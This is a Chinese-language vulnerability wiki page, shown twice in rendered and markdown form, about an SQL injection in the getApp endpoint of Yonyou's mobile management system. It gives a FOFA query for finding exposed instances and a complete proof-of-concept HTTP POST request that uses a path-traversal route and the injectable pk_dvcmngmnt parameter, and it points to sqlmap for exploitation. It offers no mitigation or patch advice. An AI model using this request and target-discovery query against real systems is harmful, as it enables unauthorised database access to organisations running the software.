fofamini-wiki

登录白背景

源码

用友移动管理系统getApp存在SQL注入漏洞

一、漏洞简介

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统getApp参数存在SQL注入漏洞

二、影响版本

用友移动系统管理系统

三、资产测绘

fofaapp="用友-移动系统管理"
特征

四、漏洞复现

POST /mobsm/common/../appManage/getApp HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
SL-CE-SUID: 18
Pragma: no-cache
Content-Length: 0

pk_dvcmngmnt=0

sqlmap

原文: https://www.yuque.com/xiaokp7/ocvun2/ar0zo8h8bz1gmxxd

# 用友移动管理系统getApp存在SQL注入漏洞

# 一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统getApp参数存在SQL注入漏洞

# 二、影响版本

- 用友移动系统管理系统

# 三、资产测绘

- fofa`app="用友-移动系统管理"`
- 特征

![image.png](./img/2IrDCTmAtfE3B_hZ/1692116995132-c3250344-57a9-4ea4-a699-2c1060a6174f-101093.png)

# 四、漏洞复现
```
POST /mobsm/common/../appManage/getApp HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
SL-CE-SUID: 18
Pragma: no-cache
Content-Length: 0

pk_dvcmngmnt=0
```
![image.png](./img/2IrDCTmAtfE3B_hZ/1700498224735-8c3d521d-fca7-41f9-87e3-4fd9fad4c9cc-364110.png)
sqlmap
![image.png](./img/2IrDCTmAtfE3B_hZ/1700498234465-67507ea1-3303-4d57-86a0-0b8fbb32df51-939628.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ar0zo8h8bz1gmxxd>